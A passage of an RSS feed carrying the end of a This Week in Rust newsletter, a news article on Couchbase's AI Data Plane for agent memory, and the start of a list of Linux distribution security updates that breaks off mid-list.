<li><a href="https://github.com/rust-lang/rust/pull/157271">simplify some <code>proc_macro</code> things</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158326">add <code>io::ErrorKind::TooManyOpenFiles</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153097">expand <code>OptionFlatten</code>'s iterator methods</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155625">move <code>std::io::Error</code> into <code>core</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158053">optimize network address parser</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17106">add <code>-Zhint-msrv</code> flag</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17237"><code>filter_map_next</code>: clean-up, overhaul suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17318"><code>chunks_exact_to_as_chunks</code>: Prevent syntactically invalid suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17317"><code>chunks_exact_to_as_chunks</code>: Use correct method name in message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17316"><code>chunks_exact_to_as_chunks</code>: Pick iter method depending on mut-ness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17302"><code>non_ascii_literal</code>, <code>invisible_characters</code>: don't suggest a fix on raw strings</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17228">create a single <code>ConstEvalCtxt</code> in <code>expr_eagerness</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17299">detect new range types in <code>higher::Range</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17270">do not trigger <code>manual_option_zip</code> when map receiver is a lazy evaluated expression</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16746">enhance <code>needless_late_init</code> to cover grouped assignments</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17257">fix: <code>borrow_as_ptr</code> is triggered on generated code</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22466">add diagnostic for E0596</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22645">add fixes add '.await' for <code>type_mismatch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22646">crash on lowering consts with associated types</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22640">crash when hovering on anonymous consts</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22582">only run <code>Drop::drop</code> when implemented</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22633">mark <code>inline_convert_while_ascii()</code> as <code>unsafe</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22115">switch out lsp-types for gen-lsp-types</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>Overall, the week was fairly neutral, with no meaningful shift on most benchmarks on any of our statistics.</p>
<p>Triage done by <strong>@simulacrum</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=8b6558a02b2774acfb25cf15e199467c37ba7490&amp;end=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;absolute=false&amp;stat=instructions%3Au">8b6558a0..7dc2c162</a></p>
<p>2 Regressions, 1 Improvement, 7 Mixed; 5 of them in rollups
34 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/master/triage/2026/2026-06-29.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/issues/143989">Tracking Issue for LocalKey/Cell::update</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/142312">Tracking Issue for <code>{str, [T], Path}::trim_prefix</code> and <code>{str, [T]}::trim_suffix</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155697">Stabilize c-variadic function definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/69835">Tracking Issue for layout information behind pointers</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158523">Fix feature gate for <code>repr(simd)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/154585">reat no_mangle_generic_items as hard error instead of lint warning</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158302">Fix <code>overflowing_literals</code> lint with repeated negation</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158504">stabilize <code>extern "custom"</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158057">Don't escape U+FF9E and U+FF9F in <code>escape_debug_ext</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1007">Decouple <code>BackendRepr</code> from ABI alignment</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1005">MCP: Stabilization strategy for rustc parallel frontend</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2166">Fields must fit in the type, even for repr(Rust)</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-rfcs"></a><a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3527">RFC: Associated const underscore</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3980">Add <code>extern "custom"</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#unsafe-code-guidelines"></a><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>
<ul>
<li><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues/615">Opsem extension proposal: atomic volatile accesses</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3977">Method chain as item</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3980">Add <code>extern "custom"</code></a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-01 - 2026-07-29 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-01 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210366/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455932/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/315211402/"><strong>Learning Game Development the Hard Way with Rust and Bevy</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345243/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-05 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095287/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-07 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315060981/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-01 | Köln, DE | <a href="https://www.meetup.com/rust-cologne-bonn">Rust Cologne</a><ul>
<li><a href="https://www.meetup.com/rustcologne/events/315404678/"><strong>Rust in July: Vecs and Strings and Slices, Oh My!</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315200163/"><strong>Rust Manchester June Talks</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Oxford, UK | <a href="https://www.meetup.com/oxford-rust-meetup-group">Oxford ACCU/Rust Meetup.</a><ul>
<li><a href="https://www.meetup.com/oxford-rust-meetup-group/events/315409335/"><strong>Building a file system from scratch</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Edinburgh, UK | <a href="https://www.meetup.com/rust-edi">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314941098/"><strong>Bevy, Bits, &amp; Cats (Rust July Talks)</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Enschede, NL | <a href="https://www.meetup.com/dutch-rust-meetup">Baseflow Tech Meetups</a><ul>
<li><a href="https://www.meetup.com/baseflow-tech-meetups/events/315099547/"><strong>AI Summit</strong></a></li>
</ul>
</li>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a><ul>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-02 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/315103359/"><strong>Git is easy?</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225861/"><strong>Boston University Rust Lunch, July 4</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>I <em>do</em> rather hope anyone using <code>-Zllvm-target-features</code> or any stabilized form thereof would know that they are getting a conversation with the dragon directly and they should mind their words carefully if they do not wish to be barbecued by it and served over a nice plate of iron filings.</p>
</blockquote>
<p>– <a href="https://rust-lang.zulipchat.com/#narrow/channel/233931-t-compiler.2Fmajor-changes/topic/Add.20.60-Zllvm-target-feature.60.20target.20.2Amodif.E2.80.A6.20compiler-team.23994/near/606147265">workingjubilee on rust zulip</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1784">Tomáš Šedovič</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ul6xfl/this_week_in_rust_658/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents need context everywhere they run, even where the cloud can't follow]]></title>
<description><![CDATA[The competitive edge in enterprise AI is shifting to context: which platform can give an agent the right memory, the right retrieval and the right data at the moment of decision.Couchbase on Tuesday announced its AI Data Plane, combining persistent agent memory, real-time context retrieval and an...]]></description>
<link>https://tsecurity.de/de/3636043/it-nachrichten/ai-agents-need-context-everywhere-they-run-even-where-the-cloud-cant-follow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636043/it-nachrichten/ai-agents-need-context-everywhere-they-run-even-where-the-cloud-cant-follow/</guid>
<pubDate>Tue, 30 Jun 2026 17:03:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The competitive edge in enterprise AI is shifting to context: which platform can give an agent the right memory, the right retrieval and the right data at the moment of decision.</p><p>Couchbase on Tuesday announced its AI Data Plane, combining persistent agent memory, real-time context retrieval and an enterprise-managed MCP server in a single operational platform. </p><p>Couchbase's roots are in <a href="https://venturebeat.com/ai/enterprise-ai-gets-closer-to-data-with-couchbases-new-capella-ai-services">caching and high-transaction databases</a> — an architecture the company argues makes it better suited for agent memory than vendors that came to the problem from search or analytics. The AI Data Plane runs identically across cloud, on-premises and disconnected edge environments, extending agent memory and local vector search to devices with no network connection.</p><p>"How do you make sure that the intelligence that you get out of these models are the ones that databases specialize in?" Gopi Duddi, CTO at Couchbase, told VentureBeat. "How can you get that value out of storage systems, which are still going to be databases?"</p><h2>What the AI Data Plane delivers</h2><p>The AI Data Plane packages three components designed to replace the fragmented stacks most enterprises are currently running.</p><p><b>Agent memory:</b> A unified persistence layer for conversational context, structured operational data and vector embeddings. Couchbase says the guardrails are what distinguish it from standalone memory services: token constraints per session, time-to-live limits on stored memories and metering controls that cap compute consumption per agent session.</p><p><b>Enterprise MCP server:</b> An enterprise-supported self-managed server for standardized model-context protocol integration, shipping as part of the platform rather than requiring a separate service.</p><p><b>Agent catalog:</b> A function-level catalog of discoverable agent tooling built by Couchbase. Duddi distinguished it from metadata catalogs like Databricks Unity or AWS Glue — describing it, in his words, as closer to a glorified MCP that surfaces agent functions as callable tools within the platform.</p><h2>Memory-first architecture takes agent context to the disconnected edge</h2><p>The lineage of Couchbase and its core architectural foundation is what Duddi says gives it an edge when it comes to context.</p><p>"We were a cache before we became a database," Duddi said.</p><p>Writing to memory is 10x faster than writing to disk, Duddi said — a speed advantage he argues separates Couchbase from NoSQL databases that layer memory workloads on top of disk-based storage.</p><p>Couchbase isn't the only data technology that has its roots in a caching layer. Redis similarly is rooted in cache and also<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits"> recently announced</a> an agentic AI context layer. Duddi argued that Couchbase is different in that it maintains an ACID (Atomicity, Consistency, Isolation, and Durability) compliant database which matters for transactional workloads. Couchbase also has a long history across multiple deployment modalities.</p><p>That architecture extends to the edge through Couchbase Lite, the platform's on-device runtime. It runs SQL, full-text search and vector search locally without a network connection, using a proprietary sync mechanism to replicate bidirectionally back to cloud or between edge nodes when connectivity returns. The target environments are retail floor operations, field service, industrial deployments and regulated settings where agent data cannot leave the device.</p><p>Duddi cited hotel reservations as an early example: multiple agents serving customers concurrently, each pulling local context and running vector search on-device, with shared session memory synchronizing centrally. The practical benefit is token efficiency. Rather than every agent independently retrieving and processing the same data, the platform caches shared context so concurrent sessions draw on it without burning tokens repeatedly.</p><h2>Agora's view from production</h2><p>Agora, a platform that helps developers embed real-time voice, video and conversational AI into enterprise applications, has run Couchbase in production since February 2024.</p><p>The initial use case was its Signaling product, managing channel setup and state synchronization for live calls. Expanding into conversational AI agents brought stricter requirements: memory-first architecture, full JSON support for storage and query, cross-datacenter replication for high availability and enterprise-grade vendor support.</p><p>"Couchbase was the best fit based on these criteria," Patrick Ferriter, SVP of Product at Agora, told VentureBeat.</p><p>Agora is now extending that relationship to support context retrieval for conversational AI agents.</p><p>"This will simplify the architecture and deliver enterprise grade RAG with predictable lower latency required for conversational AI use cases," Ferriter said.</p><p>For data professionals trying to figure out the best approach to context, there is no one answer. On platform selection, Ferriter was direct.</p><p>"It depends on the preference and goals of the organization, including timing," Ferriter  said. "If they want something enterprise grade and optimal for immediate production and scale vs. having to optimize and maintain an open-source solution with community support. We wanted the former and that is why we looked at an expanded partnership with Couchbase."</p><h2>Competitive context: following the right trend</h2><p>The context layer has become a crowded space in 2025.</p><p>Oracle put a<a href="https://venturebeat.com/data/oracle-converges-the-ai-data-stack-to-give-enterprise-agents-a-single"> memory core</a> in its database back in March providing a context layer. Redis added a<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits"> context layer</a> in May as did vector-native database vendor<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next"> Pinecone</a>.  </p><p>"Couchbase is following this trend, not setting it, but it's the right one to follow," Devin Pratt, Research Director for AI, Automation, Data and Analytics at IDC, told VentureBeat. "Its real edge is reach, running the same platform from cloud to edge to mobile, which is how enterprises actually operate. The test now is to scale against bigger names."</p><p>For teams navigating the vendor landscape, Pratt's framing is direct. "Match the tool to the workload. Consolidate where it makes sense, use a specialized engine like a graph database where relationship-heavy reasoning earns it, and let governance drive the call rather than treating memory as plumbing," Pratt said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (containernetworking-plugins, golang, kernel, libpng, libpng15, nginx, opencryptoki, perl-IO-Compress, thunderbird, and tigervnc), Debian (chromium, gdcm, incus, libhtml-parser-perl, lxd, openvpn, tor, and xorg-server), Fedora (chromium, docker-build...]]></description>
<link>https://tsecurity.de/de/3633025/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633025/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 29 Jun 2026 15:24:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (containernetworking-plugins, golang, kernel, libpng, libpng15, nginx, opencryptoki, perl-IO-Compress, thunderbird, and tigervnc), <b>Debian</b> (chromium, gdcm, incus, libhtml-parser-perl, lxd, openvpn, tor, and xorg-server), <b>Fedora</b> (chromium, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, krita, ldns, libssh2, liferea, lighttpd, mariadb10.11, mariadb11.8, moby-engine, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, openbao, pacemaker, pgadmin4, podman-tui, prometheus-podman-exporter, python-jupyter-server, python-mistune, python-postorius, python-pydantic-settings, python3-docs, python3.14, thunderbird, tigervnc, tinyproxy, and util-linux), <b>Mageia</b> (krb5), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, dracut, fence-agents, firefox, frr, frr10, glib2, glibc, gnutls, golang, kernel, libpng, libpng15, libreoffice, libxml2, libxslt, mod_http2, mysql:8.4, nginx:1.26, openssl, php:8.3, podman, postgresql-jdbc, python3.14, redis, rsync, thunderbird, tomcat, valkey, and vim), <b>Red Hat</b> (osbuild-composer), and <b>SUSE</b> (agama-web-ui, asn1c, assimp, assimp-devel, aws-iam-authenticator, calibre, clamav, corepack24, dovecot22, exiv2, frr, giflib, glances-common, google-osconfig-agent, GraphicsMagick, gvim, haproxy, hydra, ImageMagick, jupyter-nbclassic, kernel, libsoup, libsoup2, libssh2-1, nano, NetworkManager-applet-openvpn, nodejs22, openbabel, opensc, openssl-3, pacemaker, python, 